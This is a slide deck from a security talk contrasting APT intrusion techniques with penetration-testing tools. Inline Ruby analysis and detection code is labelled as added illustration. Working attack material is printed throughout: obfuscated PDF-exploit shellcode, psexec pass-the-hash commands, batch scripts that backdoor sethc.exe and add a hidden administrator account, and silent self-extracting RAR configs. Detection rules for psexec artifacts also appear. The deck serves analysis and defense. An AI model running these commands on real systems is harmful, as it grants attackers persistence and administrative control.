Evolution of PenTesting
Introduction
- Name: Russ Gideon
- Title: Director of Malware Research
- Contact: rgideon@attackresearch.com
- Twitter: @gideonsecurity
- Background:
  - Led numerous Red Teams
  - Foreign attack profiling and reverse engineering
  - Recent work in integration of malware and attack profiling attributes in Attack Research penetration testing
What is this talk?
- Evolution: a dissection of real-world attacks and some of their effects on penetration testing
- Reflection on real offensive operators vs. penetration testers
- Conclusions are derived mainly from a forensics/binary analysis perspective
What this talk is not!
- A slam on current penetration testing tools!
Evolution
- 1960s: discussions about time-sharing computers being vulnerable
  - RAND Corporation
  - NSA
- Coined the term "penetration" for this
- Evolved into Tiger Teams
- From a historical perspective, influential people in this: Willis Ware
The Birth of an Industry
- Industry realized we need to behave like attackers to learn how to defend against them
- Henceforth the industry we all know and love is born
Evolution of an Industry
- Industry gets bigger
- Tools become a commodity
- Attackers evolved and changed tactics
  - Employed varying degrees of malware
  - Deception
  - Leverage protocol and design flaws
  - Evasion and anti-analysis techniques
- The industry tools also evolved, but not in the same manner
Memory corruption == $$$
- Tools become commodity
- The shift begins
- Attackers are closed source and don't release
We Make Strange Bedfellows
Offensive Operators
Why do we call it APT?
- APT != Advanced
- Clever != Advanced
- Attackers work as hard as they have to, but not any harder
- As we step up the defense game they have to work harder
- Currently that game is not too difficult (in most places)
Outline
- Getting In
- APT Lateral Movement vs. Pentesters' Lateral Movement
- Staging the Attack
Getting In: Spear Phishing
Getting In: Example CVE-2010-2883
- Stack-based buffer overflow in CoolType.dll
- Very popular for targeted spear phishing
- 22 unique samples with this exploit in them
  - 7 of these samples are made with the Metasploit module for this
- Case study: targeted attack with a PDF, D4169301AFBC86A04135EBC4A6A4BADB.pdf
Getting In
- Metasploit has a great module for CVE-2010-2883
- If a host isn't vulnerable, it will drop and open a clean "Hello World" PDF
Getting In
- D4169301AFBC86A04135EBC4A6A4BADB.pdf includes this data stream
- Look familiar?
Getting In
- The shellcode is the only significant difference between the APT sample and a general Metasploit-created PDF
Getting In
WjozzFaiSj = unescape
var nxzarhpbywaqabgpgx0t0zgkvqwhu = "\x25\x754141\x25\x754141%63a5%u4a80\0x25 ...snip... 0x75fa65%uec10%u0937%ufb0c%ufd97 ...snip... %ud045%uc689%uc789%uc981\x25\x75ffff\x25\x75ffff%uc031%uaef2"
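As an added illustration (not code from the talk, the sample, or Metasploit), this Ruby script resolves the two layers of escaping shown above, the `\x25\x75` sequences that hide `%u` and then unescape()'s own `%uXXXX` encoding, so an analyst can hash the decoded shellcode and compare the APT sample against a Metasploit-built PDF. The input string is constructed in the same style and is not the sample's real payload.

```ruby
# Added example, not from the talk or Metasploit: normalize the obfuscated
# unescape() argument into raw bytes and fingerprint them for comparison.
require 'digest'

# Step 1: the JavaScript string literal uses \xNN to hide characters
# (\x25 = '%', \x75 = 'u'); resolve those first, as the JS engine would.
def decode_js_hex_escapes(s)
  s.gsub(/\\x([0-9a-fA-F]{2})/) { $1.hex.chr }
end

# Step 2: emulate unescape(): %uXXXX is a UTF-16 code unit (little-endian
# in memory), %XX a single byte, and anything else is copied through literally.
def unescape_to_bytes(js_literal)
  s = decode_js_hex_escapes(js_literal)
  out = []
  until s.empty?
    if s =~ /\A%u([0-9a-fA-F]{4})/
      v = $1.hex
      out << (v & 0xff) << (v >> 8)
      s = $'
    elsif s =~ /\A%([0-9a-fA-F]{2})/
      out << $1.hex
      s = $'
    else
      out << s[0].ord
      s = s[1..-1]
    end
  end
  out.pack('C*')
end

# Fingerprint of the decoded bytes; identical digests mean identical shellcode
# regardless of how each sample escaped it.
def shellcode_sha256(js_literal)
  Digest::SHA256.hexdigest(unescape_to_bytes(js_literal))
end

# Constructed input in the same style as the sample (not its real payload).
SAMPLE = '\x25\x754141\x25\x754141%uc031%uaef2'
```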
Using MSF DEP/ASLR Bypass
MSF-created PDF:
seg000:00000136 db 84h
seg000:00000137 db 4Ah
seg000:00000138 db 92h
seg000:00000139 db 0B6h
seg000:0000013a db 80h
seg000:0000013b db 4Ah
seg000:0000013c db 0FFh
seg000:0000013d db 0FFh
seg000:0000013e db 0FFh
seg000:0000013f db 0FFh
seg000:00000140 db 0FFh
seg000:00000141 db 0FFh
seg000:00000142 db 0FFh
seg000:00000143 db 0FFh
seg000:00000144 db 0FFh
seg000:00000145 db 0FFh
seg000:00000146 db 0FFh
seg000:00000147 db 0FFh
seg000:00000148 db 0
seg000:00000149 db 10h
seg000:0000014a db 0
seg000:0000014b db 0
APT-created PDF (made with MSF):
seg000:00000136 db 84h
seg000:00000137 db 4Ah
seg000:00000138 db 92h
seg000:00000139 db 0B6h
seg000:0000013a db 80h
seg000:0000013b db 4Ah
seg000:0000013c db 0FFh
seg000:0000013d db 0FFh
seg000:0000013e db 0FFh
seg000:0000013f db 0FFh
seg000:00000140 db 0FFh
seg000:00000141 db 0FFh
seg000:00000142 db 0FFh
seg000:00000143 db 0FFh
seg000:00000144 db 0FFh
seg000:00000145 db 0FFh
seg000:00000146 db 0FFh
seg000:00000147 db 0FFh
seg000:00000148 db 0
seg000:00000149 db 10h
seg000:0000014a db 0
seg000:0000014b db 0
Side Note
- The original sample from contagio:
  - Dropper is igfxver.exe
  - AV family: Chifrax
- D4169301AFBC86A04135EBC4A6A4BADB.pdf:
  - Dropper is AcroRd32.exe in temp (%TEMP%\AcroRd32.exe)
  - Drops and starts: rundll32.exe "C:\WINDOWS\system32\wuausrv.dll",TStartUp 0x11
  - AV family: Protux
  - Delivered ~2 weeks later
Getting In: Conclusion
- Pen tester: SING Table CoolType.dll Overflow MSF module with PDF dropper
  - Not a white-hat based disclosure
  - Originally found in a targeted campaign: http://contagiodump.blogspot.com/search/label/cve-2010-2883
- Attacker: rip off the MSF module
  - This attack used the Metasploit module
  - Changed out the shellcode
  - Added obfuscation
- Verdict: attacker rips off another attacker's tactic and makes it better
Outline
- Getting In
- APT Lateral Movement vs. Pen Testers' Lateral Movement
- Staging the Attack
Lateral Movement
APT Lateral Movement
- Case study: a1765a7f3376c76d8c23766a92f1cb6b.exe (nps.exe)
- Sample from an IR we conducted
- In a nutshell: their own PsExec for shoveling shells
Lateral Movement: general flow of the sample
- From the controlling node, execute: nps.exe install $Victim NPServer
- Drops nps.exe on \\victim\admin$\system32
- Creates a service around nps.exe (named NPServer) on the remote server and starts it
- Named pipes created on the victim host and used for communications: NPStdin, NPStdout
Lateral Movement
- Based upon its arguments, it is either the service binary or drops the communication piece on the remote host
Lateral Movement: dropper to the victim
Lateral Movement: remote named pipes for all communications (controlling host <-> victim host)
Lateral Movement
- Taking advantage of credential authorization
- Of course, it won't work in all situations:
  - Account needs to have administrative privileges
  - Vista and up: credentials have to be domain based; local administrative credentials can't write to C$ and Admin$
Forensic Evidence
Pen Testers' Forensic Evidence
- Metasploit has the same capability with PsExec
- General flow:
  - Pushes a service executable with the payload to \\victim\admin$\system32
  - Uses DCERPC to create a service around the service binary on the victim host
  - Starts the service on the victim
  - Uses payload-defined variables for communication
Pen Testers' Forensic Evidence
Usage
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
Major Differences!
- The NPS.exe usage screen shows flexibility to alter your forensic evidence
- Metasploit doesn't have this capability
- It derives its service name and display name from 2 pieces of code in the module:
  - Service name generation looks like: servicename = rand_text_alpha(8)
  - Display name generation looks like: displayname = 'M' + rand_text_alpha(rand(32)+1)
Major Differences: Not Blending in!
- rand_text_alpha(8)
- 'M' + rand_text_alpha(rand(32)+1)
Lateral Movement Solution
- A few lines added to the psexec module and we have some flexibility now
- Register two new options:
  - SVCName: the service name you want to use. This is what is left over in the registry under HKLM\CurrentControlSet\services if the service is not cleaned up
  - DisplayName: the display name of the service that will show up in the event logs
Lateral Movement Solution: psexec_ar options
msf exploit(psexec_ar) > set DisplayName NPServer
msf exploit(psexec_ar) > set RHOST victim
msf exploit(psexec_ar) > set SMBDomain ""
msf exploit(psexec_ar) > set SMBUser Administrator
msf exploit(psexec_ar) > set SMBPass E52CAC67449B9A233A3B108F3FA6CB6D:8846F72AE28FB127AD06BED830B7586
msf exploit(psexec_ar) > set SVCName NPServer
msf exploit(psexec_ar) > set SERVICE_FILENAME NPServer.exe
msf exploit(psexec_ar) > set EXE::Custom mycustom.exe
msf exploit(psexec_ar) > exploit
Lateral Movement Solution
- Available on GitHub: https://github.com/attackresearch/metasploit/blob/master/modules/exploits/psexec_ar.rb
Lateral Movement: Conclusion
- Pen tester: MSF psexec module
  - Randomized service names
  - Obvious badness
  - Very loud
- Attacker: custom psexec-type functionality
  - Blends in and looks normal
  - Uses named pipes for communication
  - Very basic backdoor that still isn't caught by AV
- Verdict: superior attacker technique, less likely to get caught
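From the defender's side, the "obvious badness" of the stock module and the "blends in" quality of the custom tool are both testable. The Ruby below is an added example (not from the talk, Attack Research, or the Metasploit project): it scores service-install records for the three random name shapes the stock psexec module leaves (8-letter service name, 'M' plus random display name, 8-letter .exe) and scores pipe-creation records for the NPStdin/NPStdout names the nps.exe sample used. The `key=value;...` record layout, the field names and all sample values are constructed for this example; only the Windows event ID 7045 (service installed) and the Sysmon pipe-created event (ID 17) are real.

```ruby
# Added example, not from the talk or Metasploit: flag lateral-movement tooling by
# the name shapes it leaves in service-install and pipe-creation records.
MSF_SVC_NAME     = /\A[A-Za-z]{8}\z/       # servicename = rand_text_alpha(8)
MSF_DISPLAY_NAME = /\AM[A-Za-z]{1,32}\z/   # 'M' + rand_text_alpha(rand(32)+1)
MSF_IMAGE_PATH   = /\\[A-Za-z]{8}\.exe\z/  # random SERVICE_FILENAME pushed via admin$
NPS_PIPES        = %w[NPStdin NPStdout]    # pipes nps.exe creates on the victim

# Parse the constructed "key=value;key=value" record layout into a hash.
def parse_record(line)
  line.split(';').map { |kv| kv.split('=', 2) }.to_h
end

# Returns the reasons a record looks like lateral-movement tooling (empty if none).
def classify(line)
  r = parse_record(line)
  reasons = []
  case r['event']
  when '7045'          # Windows System log: "A service was installed in the system"
    hits = [MSF_SVC_NAME, MSF_DISPLAY_NAME, MSF_IMAGE_PATH]
             .zip([r['service'], r['display'], r['image']])
             .count { |re, val| re.match?(val.to_s) }
    # All three random shapes together is the stock module; renaming any one of
    # them (the psexec_ar approach, or NPServer) breaks the set, so shape alone
    # is not enough and the pipe rule below is needed for the custom tool.
    reasons << :msf_psexec_default_names if hits == 3
  when 'pipe_created'  # e.g. Sysmon event 17
    pipe = r['pipe'].to_s.delete_prefix('\\')
    reasons << :nps_named_pipe if NPS_PIPES.include?(pipe)
  end
  reasons
end

# Run over a batch of records and keep only the flagged ones with their reasons.
def scan(lines)
  lines.map { |l| [l, classify(l)] }.reject { |_, why| why.empty? }
end

# Constructed records: stock MSF psexec, the renamed NPServer variant, an
# nps.exe pipe, and a normal Windows service for contrast.
RECORDS = [
  'event=7045;service=kYqLwzPn;display=MxTbqgrAoe;image=%SystemRoot%\BkjQwXrt.exe',
  'event=7045;service=NPServer;display=NPServer;image=%SystemRoot%\NPServer.exe',
  'event=pipe_created;pipe=\NPStdin;image=C:\Windows\system32\nps.exe',
  'event=7045;service=Spooler;display=Print Spooler;image=%SystemRoot%\System32\spoolsv.exe',
]
```

Note that NPServer itself is eight letters, so the service-name regex alone would have matched it too; it is the combination that isolates the stock module, and the renamed variant gets no hit at all, which is exactly the author's point.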
Outline
- Getting In
- APT Lateral Movement vs. Pen Testers' Lateral Movement
- Staging the Attack
Staging the Attack
Staging the Attack
- Automation is the key
- Humans make mistakes
- Automate the post exploitation
- Sounds advanced, doesn't it?
Why Raise the Bar?
- Found on various C2 hosts and on the victims: MM.exe
- Simple automation of their attack
- Helps them with speed
- Helps us with being able to know how they will operate in environments next time
- RAR files aren't just for exfiltration
Why Raise the Bar? Dissection of mm.exe
- Self-executing RAR file
- Drops 2.bat and mm.exe in C:\Temp
- C:\Temp\mm.exe isn't the same as the original mm.exe
- New mm.exe: another UPX-packed SFX
  - Drops 22.bat and net1.exe in C:\Temp
Why Raise the Bar? 2.bat
copy %windir%\explorer.exe %windir%\system32\explorer1.exe
copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe
copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe
copy c:\temp\mm.exe %windir%\system32\magnify1.exe
del %windir%\system32\sethc.exe
del %windir%\system32\magnify.exe
c:
cd %windir%\system32\
ren explorer1.exe sethc.exe
ren magnify1.exe magnify.exe
Why Raise the Bar? 22.bat
c:\temp\net1.exe user syslem$ /active:y
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 /add
c:\temp\net1.exe localgroup Administrators syslem$ /add
Now they have:
- Persistence
- Communications
Before and After
Why Raise the Bar? Build the SFX RAR file
Rar.exe a -sfxdefault.sfx -zsettings.conf mm2.exe mm.exe 2.bat
Settings.conf:
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=2.bat
Why Raise the Bar? Build the SFX RAR file
Rar.exe a -sfxdefault.sfx -zsettings1.conf mm.exe C:\Windows\System32\net1.exe 22.bat
Settings1.conf:
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=22.bat
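The two batch files above leave artifacts a responder can check for without any framework: accessibility binaries (sethc.exe, magnify.exe) that are byte-identical to a differently named executable or no longer match a trusted reference hash, and a local administrator whose name is one character away from a built-in name (syslem$ vs. SYSTEM). The Ruby below is an added example, not from the talk: the directory tree it audits, the reference hashes and the account list are constructed in a temp folder and are assumptions for illustration, not a real system32.

```ruby
# Added example, not from the talk: look for what 2.bat/22.bat leave behind.
require 'digest'
require 'tmpdir'

ACCESSIBILITY = %w[sethc.exe magnify.exe]      # binaries the batch file swapped out
BUILTIN_NAMES = %w[system administrator guest] # names worth imitating with a lookalike

def sha256(path)
  Digest::SHA256.file(path).hexdigest
end

# Returns [name, finding, detail] triples; known_good maps name => expected sha256.
def audit_accessibility(system32, known_good = {})
  exes = Dir.glob(File.join(system32, '*.exe'))
  ACCESSIBILITY.flat_map do |name|
    path = File.join(system32, name)
    next [[name, :missing, nil]] unless File.exist?(path)
    h = sha256(path)
    findings = []
    findings << [name, :hash_mismatch, h] if known_good[name] && known_good[name] != h
    # "copy explorer.exe ... ren explorer1.exe sethc.exe" leaves two identical files
    twin = exes.find { |p| File.basename(p) != name && sha256(p) == h }
    findings << [name, :copy_of, File.basename(twin)] if twin
    findings
  end
end

# Levenshtein distance: "syslem" is one substitution away from "system".
def edit_distance(a, b)
  prev = (0..b.size).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca == cb ? 0 : 1)].min
    end
    prev = cur
  end
  prev[b.size]
end

# Accounts that imitate a built-in name (case-folded, trailing '$' dropped) but are not it.
def lookalike_accounts(names)
  names.select do |n|
    base = n.downcase.delete_suffix('$')
    BUILTIN_NAMES.any? { |b| b != base && edit_distance(base, b) <= 1 }
  end
end

# Constructed tree mimicking system32 after 2.bat ran; contents are placeholders.
def demo_tree
  dir = Dir.mktmpdir
  { 'explorer.exe' => 'explorer-bytes', 'sethc.exe' => 'explorer-bytes',
    'asethc.exe' => 'real-sethc-bytes', 'magnify.exe' => 'mm-sfx-bytes' }.each { |f, d| File.write(File.join(dir, f), d) }
  dir
end
```

Note that the batch also overwrites the dllcache copy of magnify.exe, so comparing against dllcache proves nothing; the reference hash has to come from outside the host.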
Staging the Attack: Conclusion
- Pen tester: possible MSF module
  - There really isn't a tool comparison
  - Make a Metasploit module for this? Working harder than you have to?
- Attacker: attack process is automated
  - No need for a complex framework
  - Works into the attacker's tool set
  - Leverages system resources, and that is it
- Verdict: attacker technique is simple and effective; doesn't work harder than it has to
Conclusions
- Every attack (and group/person) has its characteristics, as do pen testers
- The objectives of a pen tester are usually much different than those of a nation-state operator or black hat
- Pen tests have a ton of constraints
- Pen testers are there to test for vulnerabilities
  - Which is needed
  - This is not testing the system as a whole
- How does your system react to a true compromise?
Conclusions: testing the system as a whole
- Targeted attacks affect the whole system
- Penetration testing really just looks for vulnerabilities
- We have corrupted the term "penetration test"
  - Pen test = $20K cheap scan and assessment
- Attack modeling and simulations aren't the same as our current definition of penetration tests
Attack Simulations and Modeling: testing the system as a whole
- Monitoring
- Triage process
- Incident response process
- Your operations and your vendors
- Business con-ops
- Disaster recovery
  - If you pull the plug on your network, you are in disaster recovery!
Attack Simulations: Case Study
Attack Simulations
- What's the difference between a fire inspector and a fireman?
- Fire inspectors are hired to => Inspect
  - Exit lights are working
  - Fire alarms are working
  - Fire extinguishers are up to par
- Firemen are hired to => Respond
  - Fires
  - Medical emergencies
  - Large-scale disasters
Attack Simulations
- Do not have your incident response capability behave as fire inspectors
  - They are needed to respond, not inspect
- We must start training the IR capability
  - More than just penetration testing of them
- What are firemen doing while they are down? Training
- Is your IR team technically capable of handling an incident?
  - Reverse engineering
  - PCAP analysis
  - Log mining
- Does the business know how to use them?
Attack Simulations
- You might not be ready for a full stress test of your environment
- Engage someone that has done this work and see what they can do. More than likely there is a lot they can do with and for you:
  - Testing your NOC/IR ops
  - Testing your detection tools/capabilities
  - Modeling attacker workflows and how they relate to your data
Questions?